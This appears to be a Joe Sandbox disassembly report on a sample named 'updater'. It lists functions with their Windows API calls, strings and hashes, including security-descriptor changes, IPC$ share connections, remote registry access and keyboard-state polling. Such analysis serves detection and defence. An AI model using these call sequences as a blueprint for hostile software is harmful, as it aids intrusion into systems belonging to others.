Opcode Fuzzy Hash: f54755c5caff8f54b285d70848132eaa03e1b845eed7fe7dbeadf38a215b34c0
Instruction Fuzzy Hash: F0516D711043159FC706EF10D992D6AB3F8FF98758F10891DF8999B261DB31AE05CB92

Function 0037A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0037A852
__swprintf.LIBCMT ref: 0037A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 0037A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0037A8D6
_memset.LIBCMT ref: 0037A8F5
_wcsncpy.LIBCMT ref: 0037A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0037A966
CloseHandle.KERNEL32(00000000), ref: 0037A971
RemoveDirectoryW.KERNEL32(?), ref: 0037A97A
CloseHandle.KERNEL32(00000000), ref: 0037A984

Strings

\??\%s, xrefs: 0037A86E
\, xrefs: 0037A88A
:, xrefs: 0037A895

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: aabc933ae316982ca848e03af91f86ebf04a729398a6dd2d0599a11715d87a87
Instruction ID: 0bd2c1138d7a78cde46b0d267c12ae85e1d317bfe70214ee3d5c072e62982faa
Opcode Fuzzy Hash: aabc933ae316982ca848e03af91f86ebf04a729398a6dd2d0599a11715d87a87
Instruction Fuzzy Hash: 1131D471500219ABDB229FA0DC89FEF77BCEF89700F1141B6F608D6160E77496448B25

Function 0039C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0039982C,?,?), ref: 0039C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C0F7
GlobalLock.KERNEL32(00000000), ref: 0039C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C10F
GlobalUnlock.KERNEL32(00000000), ref: 0039C118
CloseHandle.KERNEL32(00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,003A3C7C,?), ref: 0039C149
GlobalFree.KERNEL32(00000000), ref: 0039C159
GetObjectW.GDI32(00000000,00000018,?), ref: 0039C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0039C1A8
DeleteObject.GDI32(00000000), ref: 0039C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0039C1E6

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7ac8346015b7b19ccd47afe3dc2dbc52ff2e50ebc707524beadbb4f4388924b5
Instruction ID: 33c1a94595372df6ee24b24b7ccbab5cf6c6add4aa2f98d97f5cee9508b2a4d9
Opcode Fuzzy Hash: 7ac8346015b7b19ccd47afe3dc2dbc52ff2e50ebc707524beadbb4f4388924b5
Instruction Fuzzy Hash: 16411975640208EFDB269F65DC88EAABBBDEF8A711F104058F906E72A0D7319D41DB60

Function 0039C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0039C8A4
GetFocus.USER32 ref: 0039C8B4
GetDlgCtrlID.USER32(00000000), ref: 0039C8BF
_memset.LIBCMT ref: 0039C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0039CA15
GetMenuItemCount.USER32(?), ref: 0039CA35
GetMenuItemID.USER32(?,00000000), ref: 0039CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0039CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0039CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0039CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0039CB31

Strings

0, xrefs: 0039C9E2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 22b38b4abe74d6a40c395312ee1c98033e23a18a116b3b6df6633d7140d7c3d2
Instruction ID: 4dfb8594d9f4af2391708f5bdfcb602fb43c9818f1f76237fad58ec1c207fb86
Opcode Fuzzy Hash: 22b38b4abe74d6a40c395312ee1c98033e23a18a116b3b6df6633d7140d7c3d2
Instruction Fuzzy Hash: 9381B971618301AFDB16CF14D885AABBBE8FF89314F01492EF995A7291D730D905CBA2

Function 00368ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00368E3C
Part of subcall function 00368E20: GetLastError.KERNEL32(?,00368900,?,?,?), ref: 00368E46
Part of subcall function 00368E20: GetProcessHeap.KERNEL32(00000008,?,?,00368900,?,?,?), ref: 00368E55
Part of subcall function 00368E20: HeapAlloc.KERNEL32(00000000,?,00368900,?,?,?), ref: 00368E5C
Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368E73

Part of subcall function 00368EBD: GetProcessHeap.KERNEL32(00000008,00368916,00000000,00000000,?,00368916,?), ref: 00368EC9
Part of subcall function 00368EBD: HeapAlloc.KERNEL32(00000000,?,00368916,?), ref: 00368ED0
Part of subcall function 00368EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00368916,?), ref: 00368EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00368B2E
_memset.LIBCMT ref: 00368B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00368B62
GetLengthSid.ADVAPI32(?), ref: 00368B73
GetAce.ADVAPI32(?,00000000,?), ref: 00368BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00368BCC
GetLengthSid.ADVAPI32(?), ref: 00368BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00368BF8
HeapAlloc.KERNEL32(00000000), ref: 00368BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00368C20
CopySid.ADVAPI32(00000000), ref: 00368C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00368C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00368C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00368C92

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 0e9b2f43f671e1af9b999e769cbaac0ecd6b78614dc24d4007ba9166efe77aaa
Instruction ID: 2e3733cc576f19a791f87ee20a6f13b38ca37da8b43d364c60b49b06a53b770c
Opcode Fuzzy Hash: 0e9b2f43f671e1af9b999e769cbaac0ecd6b78614dc24d4007ba9166efe77aaa
Instruction Fuzzy Hash: 8C616975900209AFDF16DFA4DC44EEEBB79FF09300F048269F915AB294DB759A05CB60

Function 0037A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0037A4D4

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0037A4F6
__swprintf.LIBCMT ref: 0037A54F
__swprintf.LIBCMT ref: 0037A568
_wprintf.LIBCMT ref: 0037A61E
_wprintf.LIBCMT ref: 0037A63C

Strings

Line %d (File "%s"):, xrefs: 0037A549, 0037A562
Error: , xrefs: 0037A5E6
"%s" (%d) : ==> %s:, xrefs: 0037A637
^ ERROR, xrefs: 0037A5C0
"%s" (%d) : ==> %s:%s%s, xrefs: 0037A619

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: d5d649767c370f41c3c0c9f53b1ce66d8a7e7628bea660f72589b75b4a881047
Instruction ID: be12a2315d5eb85ff3c6c1932829ea6f81d25fa3a2c598c0c5af1dfefe072dbe
Opcode Fuzzy Hash: d5d649767c370f41c3c0c9f53b1ce66d8a7e7628bea660f72589b75b4a881047
Instruction Fuzzy Hash: DD51A371801529AACF27EBE0DE86EEEB779EF14340F104165F505B60A2EB352F58CB91

Function 00379710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037951A: __time64.LIBCMT ref: 00379524

Part of subcall function 00324A8C: _fseek.LIBCMT ref: 00324AA4

__wsplitpath.LIBCMT ref: 003797EF

Part of subcall function 0033431E: __wsplitpath_helper.LIBCMT ref: 0033435E

_wcscpy.LIBCMT ref: 00379802
_wcscat.LIBCMT ref: 00379815
__wsplitpath.LIBCMT ref: 0037983A
_wcscat.LIBCMT ref: 00379850
_wcscat.LIBCMT ref: 00379863

Part of subcall function 00379560: _memmove.LIBCMT ref: 00379599
Part of subcall function 00379560: _memmove.LIBCMT ref: 003795A8

_wcscmp.LIBCMT ref: 003797AA

Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DE1
Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00379A0D
_wcsncpy.LIBCMT ref: 00379A80
DeleteFileW.KERNEL32(?,?), ref: 00379AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00379ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379AEF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 632f966fa414b71973fc8c7f72a1bde09b50faf7408b0133384c84e4407542e9
Instruction ID: 2cbad54f8381c05c978e7d31b9cf2bbb4afd83fa3a74e602bb57d6650d859af0
Opcode Fuzzy Hash: 632f966fa414b71973fc8c7f72a1bde09b50faf7408b0133384c84e4407542e9
Instruction Fuzzy Hash: 9BC12FB1D00129AADF22DF95CC85EDEB7BDEF45310F0081AAF609EB151EB349A448F65

Function 0037AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,003A0980), ref: 0037AF4E
GetDriveTypeW.KERNEL32(00000061,003CB5F0,00000061), ref: 0037B018
_wcscpy.LIBCMT ref: 0037B042

Strings

network, xrefs: 0037AFAC
all, xrefs: 0037AF54
ramdisk, xrefs: 0037AFC2
unknown, xrefs: 0037AFD9
removable, xrefs: 0037AF80
L,:, xrefs: 0037B03A
cdrom, xrefs: 0037AF6A
fixed, xrefs: 0037AF96

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,:$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-460166681
Opcode ID: 7cd902ede46d1d9452e14219196e4ca3a938477d1bc60c475ae8febf38729507
Instruction ID: a2f36b9d186ce4de26320567f71edc8447b571cf4c8bff09fd2e60d8b36f9e35
Opcode Fuzzy Hash: 7cd902ede46d1d9452e14219196e4ca3a938477d1bc60c475ae8febf38729507
Instruction Fuzzy Hash: B951AF701083059BC32AEF14DC92AAFB7A9EF95700F50881DF4999B2A2DB319D49CB43

Function 003683FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

_memset.LIBCMT ref: 00368489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003684BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003684DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003684F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00368520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00368548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00368553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00368558

Strings

\IPC$, xrefs: 003684A0
SOFTWARE\Classes\, xrefs: 0036842A
\CLSID, xrefs: 00368440

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 3f43b6ac21d2909ff7afd89004ed273f2f638b2ad2490fbfcd13a3fface12213
Instruction ID: 635d58870d88fc3e8575351d21459e5de4f5b04e44f928e1181a3e04dc1bfb8d
Opcode Fuzzy Hash: 3f43b6ac21d2909ff7afd89004ed273f2f638b2ad2490fbfcd13a3fface12213
Instruction Fuzzy Hash: 2A410676C1022DABCF16EBA4ED95DEEB778FF18340F004529E905A6161EB309E04CB90

Function 0039147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

Strings

HKCU, xrefs: 00391581
HKEY_CLASSES_ROOT, xrefs: 00391524
HKEY_LOCAL_MACHINE, xrefs: 003914FA
HKEY_USERS, xrefs: 00391592
HKCR, xrefs: 00391539
HKCC, xrefs: 0039155F
HKU, xrefs: 003915A3
HKLM, xrefs: 0039150F
HKEY_CURRENT_CONFIG, xrefs: 0039154E
HKEY_CURRENT_USER, xrefs: 00391570

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: bd61602793bae95112d7dbb9c7345bb5becd305eca9315d59c4e7fa74c6dfeb2
Instruction ID: 590aef0d6a2b311605726d8263617030c325585cd8c376467042d58469daefb5
Opcode Fuzzy Hash: bd61602793bae95112d7dbb9c7345bb5becd305eca9315d59c4e7fa74c6dfeb2
Instruction Fuzzy Hash: 5B417C3451026ADBDF1BEF50D991AEB3364BF62300F524419FC56AB292DB30ED19CB60

Function 00375882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Part of subcall function 0032153B: _memmove.LIBCMT ref: 003215C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003758EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00375901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00375912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00375924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00375935

Strings

status PlayMe mode, xrefs: 003758E6
play PlayMe, xrefs: 00375930
alias PlayMe, xrefs: 003758C4
open , xrefs: 0037589A
play PlayMe wait, xrefs: 0037591F
close PlayMe, xrefs: 003758FC, 00375929

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 42c98c8f2beca2d195e71fd2847d59c844ed7da1a4ea85880f2d67cebdc8bc97
Instruction ID: 21572ce631c95c67420786eef1478ec814a34adc61a2a5c4c20df61f0067ee1a
Opcode Fuzzy Hash: 42c98c8f2beca2d195e71fd2847d59c844ed7da1a4ea85880f2d67cebdc8bc97
Instruction Fuzzy Hash: C011B23598016DB9D726A7A1DC4AEFFBB7CEBF6B50F400429B805E60D1DBA01D04CAA0

Function 00374C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00374C27
gethostname.WSOCK32(?,00000100), ref: 00374C41
gethostbyname.WSOCK32(?), ref: 00374C4E
_wcscpy.LIBCMT ref: 00374C76
_memmove.LIBCMT ref: 00374C89
inet_ntoa.WSOCK32(?), ref: 00374C94
_strcat.LIBCMT ref: 00374CA2
_wcscpy.LIBCMT ref: 00374CB9
WSACleanup.WSOCK32 ref: 00374CC7
_wcscpy.LIBCMT ref: 00374CD5

Strings

0.0.0.0, xrefs: 00374C70

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6fbb7cdfe1f7c888f3a5f936355c000dc93230b6f911b47a8b68b0059abb5eb1
Instruction ID: a04ad6a392605b2c842df3fa794b7a3ba37748faf04138d570d884f9301648e6
Opcode Fuzzy Hash: 6fbb7cdfe1f7c888f3a5f936355c000dc93230b6f911b47a8b68b0059abb5eb1
Instruction Fuzzy Hash: 14112C31505109BFCB2BA770DD8AEDB77BCDF41710F048165F04896091EF78A9818B51

Function 00375530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00375535

Part of subcall function 00330859: timeGetTime.WINMM(?,00000002,0031C22C), ref: 0033085D

Sleep.KERNEL32(0000000A), ref: 00375561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00375585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003755A7
SetActiveWindow.USER32 ref: 003755C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003755D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 003755F3
Sleep.KERNEL32(000000FA), ref: 003755FE
IsWindow.USER32 ref: 0037560A
EndDialog.USER32(00000000), ref: 0037561B

Strings

BUTTON, xrefs: 00375599

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7ab0efe7157b1e033e5539b7ee81811640293386eca8fa17496e54cd28fc12f6
Instruction ID: 81529644c130362025231362d3f4cacf239003cb113d8f17bbe82a047f991c43
Opcode Fuzzy Hash: 7ab0efe7157b1e033e5539b7ee81811640293386eca8fa17496e54cd28fc12f6
Instruction Fuzzy Hash: 1B21D1B0205604AFE76B5B60FC89E253B6FEB47345F045419F00A81171DFB99C149B62

Function 0037081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00370896
SetKeyboardState.USER32(?), ref: 00370901
GetAsyncKeyState.USER32(000000A0), ref: 00370921
GetKeyState.USER32(000000A0), ref: 00370938
GetAsyncKeyState.USER32(000000A1), ref: 00370967
GetKeyState.USER32(000000A1), ref: 00370978
GetAsyncKeyState.USER32(00000011), ref: 003709A4
GetKeyState.USER32(00000011), ref: 003709B2
GetAsyncKeyState.USER32(00000012), ref: 003709DB
GetKeyState.USER32(00000012), ref: 003709E9
GetAsyncKeyState.USER32(0000005B), ref: 00370A12
GetKeyState.USER32(0000005B), ref: 00370A20

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

